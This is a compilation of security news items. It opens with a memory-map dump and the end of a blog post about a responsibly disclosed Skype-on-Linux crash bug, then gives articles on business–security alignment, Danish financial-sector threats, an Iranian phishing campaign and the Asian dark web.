7fb4d695f000-7fb4d6960000 ---p 00000000 00:00 0
7fb4d6960000-7fb4d7160000 rw-p 00000000 00:00 0
7fb4d7160000-7fb4d7180000 rw-s 00000000 00:1a 195 /dev/shm/.org.chromium.Chromium.5U4VoF (deleted)
7fb4d7180000-7fb4d71c0000 rw-s 00000000 00:1a 194 /dev/shm/.org.chromium.Chromium.RLeLh9 (deleted)
7fb4d71c0000-7fb4d71e0000 rw-s 00000000 00:1a 185 /dev/shm/.org.chromium.Chromium.vuEDaD (deleted)
7fb4d71e0000-7fb4d7220000 rw-s 00000000 00:1a 124 /dev/shm/.org.chromium.Chromium.QXky36 (deleted)
7fb4d7260000-7fb4d72a0000 rw-s 00000000 00:1a 190 /dev/shm/.org.chromium.Chromium.iNwIs3 (deleted)
7fb4d72a0000-7fb4d72e0000 rw-s 00000000 00:1a 189 /dev/shm/.org.chromium.Chromium.TCc7Dx (deleted)
7fb4d7320000-7fb4d7340000 rw-s 00000000 00:1a 153 /dev/shm/.org.chromium.Chromium.niC6By (deleted)
7fb4d7340000-7fb4d7380000 rw-s 00000000 00:1a 184 /dev/shm/.org.chromium.Chromium.Bckk6z (deleted)
7fb4d7380000-7fb4d73c0000 rw-s 00000000 00:1a 183 /dev/shm/.org.chromium.Chromium.cjU5H8 (deleted)
7fb4d73c0000-7fb4d7400000 rw-s 00000000 00:1a 182 /dev/shm/.org.chromium.Chromium.T0uSjH (deleted)
7fb4d7400000-7fb4d7440000 rw-s 00000000 00:1a 181 /dev/shm/.org.chromium.Chromium.QW3FVf (deleted)
7fb4d7440000-7fb4d7480000 rw-s 00000000 00:1a 180 /dev/shm/.org.chromium.Chromium.VUxuxO (deleted)
7fb4d74c0000-7fb4d7500000 rw-s 00000000 00:1a 178 /dev/shm/.org.chromium.Chromium.HikaLV (deleted)
7fb4d7640000-7fb4d7680000 rw-s 00000000 00:1a 171 /dev/shm/.org.chromium.Chromium.4UVv2P (deleted)
7fb4d7680000-7fb4d76c0000 rw-s 00000000 00:1a 170 /dev/shm/.org.chromium.Chromium.BpeuEo (deleted)
7fb4d7700000-7fb4d7740000 rw-s 00000000 00:1a 168 /dev/shm/.org.chromium.Chromium.vB2tSv (deleted)
7fb4d7780000-7fb4d77c0000 rw-s 00000000 00:1a 166 /dev/shm/.org.chromium.Chromium.8lIy6C (deleted)
7fb4d7840000-7fb4d7880000 rw-s 00000000 00:1a 162 /dev/shm/.org.chromium.Chromium.aN74AR (deleted)
7fb4d7880000-7fb4d78c0000 rw-s 00000000 00:1a 161 /dev/shm/.org.chromium.Chromium.ExRifq (deleted)
7fb4d78c0000-7fb4d7900000 rw-s 00000000 00:1a 160 /dev/shm/.org.chromium.Chromium.O1MxTY (deleted)
7fb4d7940000-7fb4d7980000 rw-s 00000000 00:1a 158 /dev/shm/.org.chromium.Chromium.mxd5b6 (deleted)
7fb4d79c0000-7fb4d7a00000 rw-s 00000000 00:1a 156 /dev/shm/.org.chromium.Chromium.byaHud (deleted)
7fb4d7a40000-7fb4d7a80000 rw-s 00000000 00:1a 132 /dev/shm/.org.chromium.Chromium.2FEnNk (deleted)
7fb4d7ac0000-7fb4d7b00000 rw-s 00000000 00:1a 130 /dev/shm/.org.chromium.Chromium.HFba6r (deleted)
7fb4d7b00000-7fb4d7b40000 rw-s 00000000 00:1a 129 /dev/shm/.org.chromium.Chromium.tFrAK0 (deleted)
7fb4d7b40000-7fb4d7b80000 rw-s 00000000 00:1a 152 /dev/shm/.org.chromium.Chromium.4rXuc5 (deleted)
7fb4d7b80000-7fb4d7bc0000 rw-s 00000000 00:1a 151 /dev/shm/.org.chromium.Chromium.ei9cxE (deleted)
7fb4d7f40000-7fb4d7f80000 rw-s 00000000 00:1a 146 /dev/shm/.org.chromium.Chromium.hbGEFc (deleted)
7fb4d7fc0000-7fb4d8000000 rw-s 00000000 00:1a 144 /dev/shm/.org.chromium.Chromium.TaWipl (deleted)
7fb4d8000000-7fb4d803c000 rw-p 00000000 00:00 0
7fb4d803c000-7fb4dc000000 ---p 00000000 00:00 0
7fb4dc000000-7fb4dc021000 rw-p 00000000 00:00 0
7fb4dc021000-7fb4e0000000 ---p 00000000 00:00 0
7fb4e0000000-7fb4e0022000 rw-p 00000000 00:00 0
7fb4e0022000-7fb4e4000000 ---p 00000000 00:00 0
7fb4e4030000-7fb4e4094000 rw-s 00000000 00:1a 111 /dev/shm/.org.chromium.Chromium.7I5ZtW (deleted)
7fb4e4094000-7fb4e40f4000 rw-s 00000000 00:1a 100 /dev/shm/.org.chromium.Chromium.L6QAhS (deleted)
7fb4e40f4000-7fb4e4154000 rw-s 00000000 00:1a 91 /dev/shm/.org.chromium.Chromium.Sf8WzY (deleted)
7fb4e4154000-7fb4e4155000 ---p 00000000 00:00 0
7fb4e4155000-7fb4e4955000 rw-p 00000000 00:00 0
7fb4e4995000-7fb4e49d5000 rw-s 00000000 00:1a 137 /dev/shm/.org.chromium.Chromium.Hx0IZk (deleted)
7fb4e49d5000-7fb4e637d000 r-xp 00000000 08:01 26878205 /usr/lib/x86_64-linux-gnu/libicudata.so.60.2
7fb4e637d000-7fb4e657c000 ---p 019a8000 08:01 26878205 /usr/lib/x86_64-linux-gnu/libicudata.so.60.2
7fb4e657c000-7fb4e657d000 r--p 019a7000 08:01 26878205 /usr/lib/x86_64-linux-gnu/libicudata.so.60.2
7fb4e657d000-7fb4e657e000 rw-p 019a8000 08:01 26878205 /usr/lib/x86_64-linux-gnu/libicudata.so.60.2
7fb4e657e000-7fb4e6721000 r-xp 00000000 08:01 26878215 /usr/lib/x86_64-linux-gnu/libicuuc.so.60.2
7fb4e6721000-7fb4e6920000 ---p 001a3000 08:01 26878215 /usr/lib/x86_64-linux-gnu/libicuuc.so.60.2
7fb4e6920000-7fb4e6933000 r--p 001a2000 08:01 26878215 /usr/lib/x86_64-linux-gnu/libicuuc.so.60.2
7fb4e6933000-7fb4e6934000 rw-p 001b5000 08:01 26878215 /usr/lib/x86_64-linux-gnu/libicuuc.so.60.2
7fb4e6934000-7fb4e6935000 rw-p 00000000 00:00 0
7fb4e6935000-7fb4e6bc7000 r-xp 00000000 08:01 26878207 /usr/lib/x86_64-linux-gnu/libicui18n.so.60.2
7fb4e6bc7000-7fb4e6dc6000 ---p 00292000 08:01 26878207 /usr/lib/x86_64-linux-gnu/libicui18n.so.60.2
7fb4e6dc6000-7fb4e6dd5000 r--p 00291000 08:01 26878207 /usr/lib/x86_64-linux-gnu/libicui18n.so.60.2
7fb4e6dd5000-7fb4e6dd6000 rw-p 002a0000 08:01 26878207 /usr/lib/x86_64-linux-gnu/libicui18n.so.60.2
7fb4e6dd6000-7fb4e6e1b000 r-xp 00000000 08:01 27136130 /usr/lib/x86_64-linux-gnu/libunity/libunity-protocol-private.so.0.0.0
7fb4e6e1b000-7fb4e701a000 ---p 00045000 08:01 27136130 /usr/lib/x86_64-linux-gnu/libunity/libunity-protocol-private.so.0.0.0
7fb4e701a000-7fb4e701d000 r--p 00044000 08:01 27136130 /usr/lib/x86_64-linux-gnu/libunity/libunity-protocol-private.so.0.0.0
7fb4e701d000-7fb4e701e000 rw-p 00047000 08:01 27136130 /usr/lib/x86_64-linux-gnu/libunity/libunity-protocol-private.so.0.0.0
7fb4e701e000-7fb4e7057000 r-xp 00000000 08:01 26877853 /usr/lib/x86_64-linux-gnu/libdee-1.0.so.4.2.1
7fb4e7057000-7fb4e7257000 ---p 00039000 08:01 26877853 /usr/lib/x86_64-linux-gnu/libdee-1.0.so.4.2.1
7fb4e7257000-7fb4e7258000 r--p 00039000 08:01 26877853 /usr/lib/x86_64-linux-gnu/libdee-1.0.so.4.2.1
7fb4e7258000-7fb4e7259000 rw-p 0003a000 08:01 26877853 /usr/lib/x86_64-linux-gnu/libdee-1.0.so.4.2.1
7fb4e7259000-7fb4e72f6000 r-xp 00000000 08:01 26878675 /usr/lib/x86_64-linux-gnu/libunity.so.9.0.2
7fb4e72f6000-7fb4e74f6000 ---p 0009d000 08:01 26878675 /usr/lib/x86_64-linux-gnu/libunity.so.9.0.2
7fb4e74f6000-7fb4e74fa000 r--p 0009d000 08:01 26878675 /usr/lib/x86_64-linux-gnu/libunity.so.9.0.2
7fb4e74fa000-7fb4e74fc000 rw-p 000a1000 08:01 26878675 /usr/lib/x86_64-linux-gnu/libunity.so.9.0.2
7fb4e74fc000-7fb4e74fd000 rw-p 00000000 00:00 0
7fb4e74fd000-7fb4e74fe000 ---p 00000000 00:00 0
7fb4e74fe000-7fb4e7cfe000 rw-p 00000000 00:00 0
7fb4e7cfe000-7fb4e7dc3000 r-xp 00000000 07:15 15069 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/electron-ssid/build/Release/electron-ssid.node
7fb4e7dc3000-7fb4e7fc2000 ---p 000c5000 07:15 15069 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/electron-ssid/build/Release/electron-ssid.node
7fb4e7fc2000-7fb4e7fcb000 rw-p 000c4000 07:15 15069 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/electron-ssid/build/Release/electron-ssid.node
7fb4e7fcb000-7fb4e7fdf000 rw-p 00000000 00:00 0
7fb4e7fdf000-7fb4e7fff000 rw-p 00101000 07:15 15069 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/electron-ssid/build/Release/electron-ssid.node
7fb4e7fff000-7fb4ec000000 rw-s 00000000 00:1a 12 /dev/shm/pulse-shm-2958556533
7fb4ec000000-7fb4ec021000 rw-p 00000000 00:00 0
7fb4ec021000-7fb4f0000000 ---p 00000000 00:00 0
7fb4f002d000-7fb4f0091000 rw-s 00000000 00:1a 90 /dev/shm/.org.chromium.Chromium.JPBrMl (deleted)
7fb4f0091000-7fb4f00d1000 rw-s 00000000 00:1a 134 /dev/shm/.org.chromium.Chromium.ctJK62 (deleted)
7fb4f00f1000-7fb4f0151000 rw-s 00000000 00:1a 89 /dev/shm/.org.chromium.Chromium.kfsXYI (deleted)
7fb4f0151000-7fb4f01d2000 rw-s 00000000 08:01 1838001 /home/input0/snap/skype/common/.config/skypeforlinux/Cache/index
7fb4f01d2000-7fb4f01d3000 ---p 00000000 00:00 0
7fb4f01d3000-7fb4f09d3000 rw-p 00000000 00:00 0
7fb4f09d3000-7fb4f0a1f000 r-xp 00000000 07:15 484 /snap/skype/51/usr/lib/x86_64-linux-gnu/libsecret-1.so.0.0.0
7fb4f0a1f000-7fb4f0c1e000 ---p 0004c000 07:15 484 /snap/skype/51/usr/lib/x86_64-linux-gnu/libsecret-1.so.0.0.0
7fb4f0c1e000-7fb4f0c21000 r--p 0004b000 07:15 484 /snap/skype/51/usr/lib/x86_64-linux-gnu/libsecret-1.so.0.0.0
7fb4f0c21000-7fb4f0c22000 rw-p 0004e000 07:15 484 /snap/skype/51/usr/lib/x86_64-linux-gnu/libsecret-1.so.0.0.0
7fb4f0c22000-7fb4f0c26000 rw-p 00050000 07:15 484 /snap/skype/51/usr/lib/x86_64-linux-gnu/libsecret-1.so.0.0.0
7fb4f0c26000-7fb4f0cba000 r-xp 00000000 07:15 15077 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/keytar/build/Release/keytar.node
7fb4f0cba000-7fb4f0eb9000 ---p 00094000 07:15 15077 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/keytar/build/Release/keytar.node
7fb4f0eb9000-7fb4f0ec0000 rw-p 00093000 07:15 15077 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/keytar/build/Release/keytar.node
7fb4f0ec0000-7fb4f0ed3000 rw-p 00000000 00:00 0
7fb4f0ed3000-7fb4f0eea000 rw-p 000c1000 07:15 15077 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/keytar/build/Release/keytar.node
7fb4f0eea000-7fb4f12eb000 rw-s 00000000 00:1a 112 /dev/shm/.org.chromium.Chromium.8b0GDI (deleted)
7fb4f12eb000-7fb4f132b000 rw-s 00000000 00:1a 110 /dev/shm/.org.chromium.Chromium.wo010t (deleted)
7fb4f136b000-7fb4f13ab000 rw-s 00000000 00:1a 108 /dev/shm/.org.chromium.Chromium.4MWzbK (deleted)
7fb4f13ab000-7fb4f13eb000 rw-s 00000000 00:1a 107 /dev/shm/.org.chromium.Chromium.PCNSgn (deleted)
7fb4f13eb000-7fb4f142b000 rw-s 00000000 00:1a 106 /dev/shm/.org.chromium.Chromium.UUZcm0 (deleted)
7fb4f146b000-7fb4f14ab000 rw-s 00000000 00:1a 104 /dev/shm/.org.chromium.Chromium.MzjVwg (deleted)
7fb4f14bb000-7fb4f14cb000 rw-s 00000000 00:1a 118 /dev/shm/.org.chromium.Chromium.GgMWqU (deleted)
7fb4f14cb000-7fb4f14eb000 rw-s 00000000 00:1a 109 /dev/shm/.org.chromium.Chromium.CbpRGw (deleted)
7fb4f14eb000-7fb4f152b000 rw-s 00000000 00:1a 38 /dev/shm/.org.chromium.Chromium.keWIHw (deleted)
7fb4f152b000-7fb4f156b000 rw-s 00000000 00:1a 102 /dev/shm/.org.chromium.Chromium.9HJ9M9 (deleted)
7fb4f1577000-7fb4f1587000 rw-s 00000000 00:1a 113 /dev/shm/.org.chromium.Chromium.UPK1Ee (deleted)
7fb4f1587000-7fb4f15eb000 rw-s 00000000 00:1a 34 /dev/shm/.org.chromium.Chromium.leYub6 (deleted)
7fb4f15eb000-7fb4f162b000 rw-s 00000000 00:1a 97 /dev/shm/.org.chromium.Chromium.6IeB32 (deleted)
7fb4f162b000-7fb4f1a2c000 rw-s 00000000 00:1a 85 /dev/shm/.org.chromium.Chromium.6d3WFD (deleted)
7fb4f1a2c000-7fb4f1a6c000 rw-s 00000000 00:1a 83 /dev/shm/.org.chromium.Chromium.IjR5gj (deleted)
7fb4f1a6c000-7fb4f1aac000 rw-s 00000000 00:1a 88 /dev/shm/.org.chromium.Chromium.cG4AwK (deleted)
7fb4f1aac000-7fb4f1aec000 rw-s 00000000 00:1a 77 /dev/shm/.org.chromium.Chromium.StnttE (deleted)
7fb4f1aec000-7fb4f1b2c000 rw-s 00000000 00:1a 71 /dev/shm/.org.chromium.Chromium.xRFG4j (deleted)
7fb4f1b2c000-7fb4f1b2d000 ---p 00000000 00:00 0
7fb4f1b2d000-7fb4f25f5000 rw-p 00000000 00:00 0
7fb4f25f5000-7fb4f25f6000 ---p 00000000 00:00 0
7fb4f25f6000-7fb4f2df6000 rw-p 00000000 00:00 0
7fb4f2df6000-7fb4f2dfb000 r-xp 00000000 07:0b 2287 /snap/core/5328/lib/x86_64-linux-gnu/libnss_dns-2.23.so
7fb4f2dfb000-7fb4f2ffb000 ---p 00005000 07:0b 2287 /snap/core/5328/lib/x86_64-linux-gnu/libnss_dns-2.23.so
7fb4f2ffb000-7fb4f2ffc000 r--p 00005000 07:0b 2287 /snap/core/5328/lib/x86_64-linux-gnu/libnss_dns-2.23.so
7fb4f2ffc000-7fb4f2ffd000 rw-p 00006000 07:0b 2287 /snap/core/5328/lib/x86_64-linux-gnu/libnss_dns-2.23.so
7fb4f2ffd000-7fb4f2ffe000 ---p 00000000 00:00 0
7fb4f2ffe000-7fb4f37fe000 rw-p 00000000 00:00 0
7fb4f37fe000-7fb4f37ff000 ---p 00000000 00:00 0
7fb4f37ff000-7fb4f3fff000 rw-p 00000000 00:00 0
7fb4f3fff000-7fb4f8000000 rw-s 00000000 00:1a 7 /dev/shm/pulse-shm-796608596
7fb4f8000000-7fb4f8083000 rw-p 00000000 00:00 0
7fb4f8083000-7fb4fc000000 ---p 00000000 00:00 0
7fb4fc000000-7fb4fc021000 rw-p 00000000 00:00 0
7fb4fc021000-7fb500000000 ---p 00000000 00:00 0
7fb500000000-7fb500021000 rw-p 00000000 00:00 0
7fb500021000-7fb504000000 ---p 00000000 00:00 0
7fb504000000-7fb504021000 rw-p 00000000 00:00 0
7fb504021000-7fb508000000 ---p 00000000 00:00 0
7fb508000000-7fb508021000 rw-p 00000000 00:00 0
7fb508021000-7fb50c000000 ---p 00000000 00:00 0
7fb50c000000-7fb50c30a000 rw-p 00000000 00:00 0
7fb50c30a000-7fb510000000 ---p 00000000 00:00 0
7fb510000000-7fb510028000 rw-p 00000000 00:00 0
7fb510028000-7fb514000000 ---p 00000000 00:00 0
7fb514000000-7fb514008000 rw-s 00000000 00:1a 187 /dev/shm/.org.chromium.Chromium.wp000v (deleted)
7fb514008000-7fb514048000 rw-s 00000000 00:1a 68 /dev/shm/.org.chromium.Chromium.kV2UFZ (deleted)
7fb514048000-7fb514088000 rw-s 00000000 00:1a 87 /dev/shm/.org.chromium.Chromium.JUxFl8 (deleted)
7fb514088000-7fb5140c8000 rw-s 00000000 00:1a 65 /dev/shm/.org.chromium.Chromium.476qSk (deleted)
7fb5140c8000-7fb514108000 rw-s 00000000 00:1a 96 /dev/shm/.org.chromium.Chromium.1d878F (deleted)
7fb514108000-7fb514148000 rw-s 00000000 00:1a 86 /dev/shm/.org.chromium.Chromium.IHmLaw (deleted)
7fb514148000-7fb51414a000 r-xp 00000000 08:01 8917743 /lib/x86_64-linux-gnu/libnss_mdns4_minimal.so.2
7fb51414a000-7fb514349000 ---p 00002000 08:01 8917743 /lib/x86_64-linux-gnu/libnss_mdns4_mini
$
Cool, so when I read the backtrace, I understood that this might be a memory corruption in `malloc()`.

So basically, the memory allocator allocates pages of memory at once for use of programs, and it gives you a pointer within them. Since this files which I am trying to share may be larger for skype to handle during the call (PS: I was just sharing a jpg file in this case which was of 800kB). But for skype if a larger program is allocating larger amounts of memory and writing further past the end of your allocated space, then you’ll end up attempting to write into unallocated memory and may cause a memory corruption.

Being a fan of responsible disclosure, I submitted this to Microsoft on 8 August 2018, but MS says “Upon investigation, we have determined that this submission does not meet the bar for security servicing” 🤦

Okay, but I passed on this message to skype team on twitter, and they looked into this!

skype bug
At last, this was patched on Skype version 8.29.0.41 on Linux.


The Continuing Problem of Aligning Cybersecurity With Business
4.9.2018 securityweek  Cyber

Aligning security policy with business practices is generally considered to be a key imperative for a successful company. This must necessarily start with security teams understanding the business, and business leaders understanding security requirements.

Varonis decided to test the progress by querying 345 C-Suite executives and IT/cybersecurity professionals -- broadly separated into business and IT/security groups -- across the U.S., UK, France and Germany. The results show apparent progress, but with puzzling details that might indicate slightly divergent viewpoints between the two groups.

For example, asked what types of data most need to be protected, both groups agreed on first customer or patient data, and second, intellectual property. They disagreed however, on the third priority. The business group specified employee data, while the security group specified financial data.

However, the most surprising divergence comes in the response to a query on the business impact of a data breach. The security group were most concerned about loss of brand image for the business, while the business group were most concerned with the cost of recovery.

"If I had been asked before the survey," Brian Vecci, technical evangelist at Varonis, told SecurityWeek, "I would have thought that non-IT folks would have been more concerned about brand image and damage than with IT recovery costs -- but it's actually the other way around. It's the security experts that are most concerned with brand perception and intellectual property loss, whereas the non-IT C-suite execs -- the top business leaders -- tend to think that IT recovery costs are the biggest issues."

The figures suggest that business and IT/sec are still not fully aligned, but in a non-intuitive manner. The reason could be something simple. Business leaders understand business better than they understand cybersecurity, and consequently worry more about what they don't fully understand; while IT/sec people understand security better than they understand commerce.

Or it could be a continuing failure for IT/sec to find the best metrics for reporting to business leaders. "It's all about data," said Vecci. "Nobody ever breaks into a network to steal the network log -- it's all about data, either exfiltrating and stealing data, or in denying service with something like ransomware."

IT/sec is aware of the scale of the data issue, while business leaders are only just becoming aware. "We're living is a more dangerous interconnected world, where anybody, anywhere can -- and if they want to, probably will -- get into your network," continued Vecci. "And the scale of the problems they have to solve when it comes to data is far bigger than it used to be. Most companies have between 30% and 50% more data this year than they had last year, and it's not slowing down -- it's just the way things work."

The data that needs to be secured is also changing in its nature. A few years ago, most sensitive data was stored in structured databases, and the need and methodologies for securing that data were well understood. Now, however, the majority of sensitive data -- made more sensitive by increasingly stringent data privacy laws like the GDPR -- is held in unstructured files and documents. Earlier this year, the 2018 Varonis Global Data Risk Report showed that 41% of companies have more than 1,000 sensitive files open to everyone with access to the network, 58% of companies have more than 100,000 folders open to everyone.

IT and security teams need increasing budgets to solve the increasing problems -- so their reporting tends to reflect the problems. They, however, are less concerned because they can see the improvements to their security posture; and the Varonis figures confirm this. Ninety-one percent of the IT/sec group believe their organization is making progress in security, while only 69% of the business leaders see that progress.

"The arrival of machine learning technologies has helped CISOs believe they are moving the needle and improving security," suggests Vecci. "They can see this, while business execs, who tend to have a more binary view of things, possibly cannot see it."

The misalignment between IT/sec and business leaders may, then, be down to the difficulty of delivering meaningful metrics on the effect of machine learning defenses. This is possibly confirmed by one of the responses in the Varonis survey. Asked whether the organization can quantify the effect of cybersecurity measures, 88% of the IT/sec group replied in the affirmative, while only 68% of the business group agreed.

Unfortunately, while this may be partially true, other figures from the Varonis survey suggest that there remains a fundamental divide between the two sides. Ninety-six per cent of the IT/sec group believes their security planning approach is aligned with the organization's risks and objectives, but only 73% of the business leaders agree.

Perhaps the most concerning response came from the question on whether business is actually listening to IT/sec. Asked whether the leadership acts on input/guidance from the IT/sec team, 94% of the IT/sec team agreed, while only 76% of the business group agreed.

This Varonis survey shows that a fundamental misalignment still exists between business and IT/sec -- but not always in the most obvious manner. It could possibly be because business leaders still do not understand cybersecurity and simply turn a deaf ear to demands for more budget; or it could be the continuing inability of the IT/sec team to find the right metrics that can be understood by business people. This could in turn be down to the speed of technological changes. IT/sec is introducing new technologies like machine learning at a faster rate than they can provide metrics on the performance of those technologies.


The cyber threat against Danish financial sector is very high
4.9.2018 securityaffairs Cyber

A report published by the Centre for Cyber Security (Center for Cybersikkerhed) states that the threat to the Danish financial sector is very high.
According to a report by the Centre for Cyber Security (Center for Cybersikkerhed), a department of military security agency FET (Forsvarets Efterretningstjeneste), the cyber threat against the Danish financial sector is very high.

The centre monitors the attacks against Denmark and Danish businesses.

“The threat posed to the Danish financial sector by cyber crime is very high,” reads the report published by the centre.

The threat is “becoming increasingly advanced and complex, and cyber attacks can disrupt the access to Danish financial sector services,”

The centre warns of a specific threat with “capacity, intention, planning and possible implementation. Attack/damaging activity is very likely.”

The government experts believe that the cyber espionage represents one of the main threat for the country and its businesses.

Digital espionage is also considered to be a high area of risk, according to the report.

“It is likely that foreign states have both political and economic interest in conducting cyber espionage against the Danish financial sector,” continues the report.

It is interesting to note that the Government centre classifies the threat of cyber terrorism to the financial industry as low.

“But the report also found only a low threat of cyber terror, in which cyber attacks would aim to completely bring down financial systems in Denmark. states The Local news agency.

Finans Danmark, a representative organisation for the financial sector, said it recognised the level of cyber threat described by the agency report.”

Danish financial sector

Cybercriminal organizations focused on banks are intensifying their actions and their operations are becoming even more sophisticated. In the last years, security experts have monitored the activities of several threat actors specialized in attacks aimed at the financial sector and their customers.

“As the systems at banks become stronger, so too do the methods used by cyber crimials become more advanced, and that requires us to constantly keep up,” Finans Danmark director of digitalisation Michael Busk-Jepsen wrote in a press statement.

“There is no doubt that crime aimed at banks and bank customers via the internet is growing,” Busk-Jepsen added.


Iranian Hackers Target Universities in Large Attack Campaign: SecureWorks
29.8.2018 securityweek Cyber

SecureWorks security researchers have discovered that a new, large phishing campaign targeting universities is similar to previous cyber operations by an actor associated with the Iranian government.

The campaign involved the use of sixteen domains that contained more than 300 spoofed websites and login pages for 76 universities in 14 countries, including Australia, Canada, China, Israel, Japan, Switzerland, Turkey, the United Kingdom, and the United States.

Many of the spoofed domains, SecureWorks says, referenced the targeted universities’ online library systems, suggesting that the actors behind the campaign were interested in accessing those resources. Not all domains were accessible during analysis.

Victims who entered their login credentials into the fake login pages were redirected to the legitimate websites. Once there, they were either automatically logged into a valid session or asked for the login credentials again, SecureWorks explains.

Many of the domains were registered between May and August 2018, the most recent of them on August 19. Most of the identified domains resolved to the same IP address and DNS name server.

The attacks share infrastructure with a previously observed campaign associated with the Iran-linked COBALT DICKENS hackers. In March, the United States indicted the Mabna Institute and nine Iranian nationals in connection with the group’s activity between 2013 and 2017.

According to the U.S. Department of Justice, the hackers targeted the accounts of more than 100,000 university professors worldwide and managed to compromise around 8,000 of them. The actors were also said to have stolen 31 terabytes of academic data and intellectual property.

“Many threat groups do not change their tactics despite public disclosures, and analysis suggests that COBALT DICKENS may be responsible for the university targeting despite the indictments of some members,” SecureWorks says.

It is not uncommon for threat actors to target universities when looking to steal intellectual property. Not only are universities more difficult to secure compared to finance or healthcare organizations, but they are also highly attractive because they develop cutting-edge research and can attract global researchers and students, SecureWorks points out.


A Guided Tour of the Asian Dark Web
9.8.2018 securityweek Cyber

Inside the Asian Dark Web - Cybercrime

The Asian dark web is not well known. Most people just think of Russia when thinking about underground hacking forums. To gain a better understanding of Asian onion sites and black markets, researchers from IntSights embarked on a six-month long investigation and analysis.

The results, published this week at Black Hat, show a diverse, culturally sensitive and wider than perhaps expected Asian dark web. Along with the report, IntSights' director of threat research, Itay Kozuch, took SecurityWeek on a guided tour of the Asian dark web.

We started at the Hidden Wiki, a South Korean page that bookmarks other sites in the dark web all over the world. "It's been live for a few years, and is being maintained on a regular basis," explained Kozuch. The page is organized in sections and even provides an 'editor's choice' selection. It provides links to whatever the existing or budding hacker or underworld character might be looking for: bank accounts, card details, advice, drugs, porn, fake passports and IDs, UK driving licenses, firearms and more.

"It's a good place to start a foray into the dark web," said Kozuch. Despite this expansive index onto blacker parts of the dark web, the IntSights report, "At the moment, there are no significant threat actors that operate out of South Korea."

Our next stop was deeper into the dark web: Mushroom, a Chinese black-market site specializing in the sale of drugs. "The most important feature for the researcher," continued Kozuch, "are the prices. They are all in Chinese Yuan, not as we usually see in dark websites, bitcoin or other cryptocurrency." This is because cryptocurrencies are forbidden in China and the site primarily serves Chinese nationals -- although it does offer advice on how to obtain bitcoin and is willing to ship produce outside of China. The price is also 30% to 40% lower than is typically found in western black markets.

From there we moved to Japan. The Japanese dark web has one major difference to other parts: it is remarkably polite. "Many Japanese users view it as an alternate universe," says the report, "where they can express themselves and have harmless discussions, just behind the mask of an anonymous avatar. It is not uncommon to see diaries and blogs on the Japanese dark web." It is more about obtaining things, such as drugs and porn, than about facilitating hacking. One even asks the visitor to suggest a price for the products.

We visited the Japanese branch of Anonymous, which is a bit of an exception. "Its primary purpose is protest against the Japanese government on environmental issues," explained Kozuch. Two current ops are Hope Japan and Hope Fukushima. "Anonymous accuses the Japanese government of hiding information about what really happened in the nuclear plant, and the extent of pollution in the seas around Japan." The website directly calls for attacks against Japanese government websites, and Anonymous is willing to provide what is necessary -- methodologies for DDoS, SQLi, XSS and other attack vectors.

We then visited another Japanese language site that is a bit different -- a site that buys and sells information, focusing on military intelligence, documents, protocols, science, and technology, "What's really remarkable," added Kozuch, "is that this site is not typically Japanese in flavor. Japanese sites usually handle drugs and porn. After analyzing the style and content, "We came to the conclusion that this is not a Japanese website at all. The Japanese would never be so direct and forthright. We suspect that the people behind it are North Korean, which has its problems with Japan." The report adds that it may be a North Korean (or Chinese) group "that is attempting to gather intelligence for some attack on or operation in Japan)."

We also visited another Anonymous site in Thailand (this one is offering a free database of 30,000 FBI and DHS officers stolen in 2016); and a hacking forum/black market in Indonesia (providing free downloads of malware and exploits).

The main focus, however, was on China, and we visited three more websites. Surprisingly, none of these are onion sites. They are dark sites to anybody outside of China because of the Chinese firewall, but in the clear web to Chinese nationals. The first offers DDoS as a packaged service -- a fairly unique offering selling different options of strength and duration. "The largest offering," Kozuch pointed out, "is for a 500 Gb attack with unlimited connections."

The second, known as QQ, is a hacking forum designed as a combination of different social media platforms and providing communication tools such as QQ groups, QQ forums and private chatrooms.

The last was Hack80, a hacking forum more in line with the better known Russian underground forums. "It offers everything you might find in the traditional Russian hacking forums," said Kozuch: "bitcoin mining tutorials, hacker toolkits, malware and so on. You can ask about and get almost anything -- if you're Chinese, of course. You cannot ask questions or get answers in English." This isn't surprising since the site is in the clear web, and thus only visible to Chinese nationals (IntSights was using a very specific VPN for the research and this tour).

Kozuch believes it is time for the West to take the Chinese dark web more seriously. "We usually like to look at the North Koreans and the Russians as the primary attackers; but I believe that the Chinese offer is more sophisticated with more capability than we have realized. Many of the next threats that we are going to see will come from China."

The fact that so many dark Chinese sites are on the Chinese clear web raises the question of collusion between the hackers and the government. Kozuch does not believe that the existence of hacking sites in the clear web automatically means they are permitted by the government, or that the hackers work for the government. It is perfectly feasible for these sites to hide in plain sight given the size of the Chinese internet.

"I think there is a big element of private cybercrime groups that operate from China that we were simply not aware of," he told SecurityWeek. "It is more comfortable to blame the APT groups we already know about, but I think this research shows how much knowledge and how much capability that private groups have, and how they communicate and what kind of tools they are using."

He suspects that we often automatically blame APT groups simply because the attack comes from China; but the perpetrator may well be an unknown private group. "Usually, APT groups (with the exception of North Korea) are not after money -- they're after intelligence or to steal intellectual property. I believe that in some cases there are Chinese threat actors that we simply aren't aware of." As in Russia, many of the Chinese threat actors will focus on targets outside of China so as not to draw the attention -- and ire -- of the local police.

But this doesn't mean there is no collusion at all between the criminal groups and the Chinese government. "I haven't found any evidence that private groups are sub-contracting for the government," he continued, "but I really believe that it is happening -- like in many other places around the world. Sometimes the government doesn't have all the capabilities it needs, so it uses sub-contractors who will deliver the skills provided the government allows them to continue their own operations outside of China. There are examples of known Chinese hackers that are now running their own security firms. Nobody turns from crime life to become whitehats for no reason and without any consequences. I really believe that there are all kinds of groups that enjoy government protection because they provide services to the government when it needs it. Give and take rules."

"The Asian dark web," concludes the IntSights research, "is relatively small compared to its counterparts in Western countries, such as the United States and Europe. However, this doesn't mean that it poses less of a threat. In fact, due to the laws and political motivations of these countries, the risk to non-Asian companies is significantly higher."

Israel-born startup IntSights Cyber Intelligence raised $17 million in a Series C funding round led by Tola Capital in June 2018; bringing the total capital raised by the firm to $41.3 million. IntSights was founded in 2015 by Alon Arvatz, Gal Ben David, Guy Nizan.


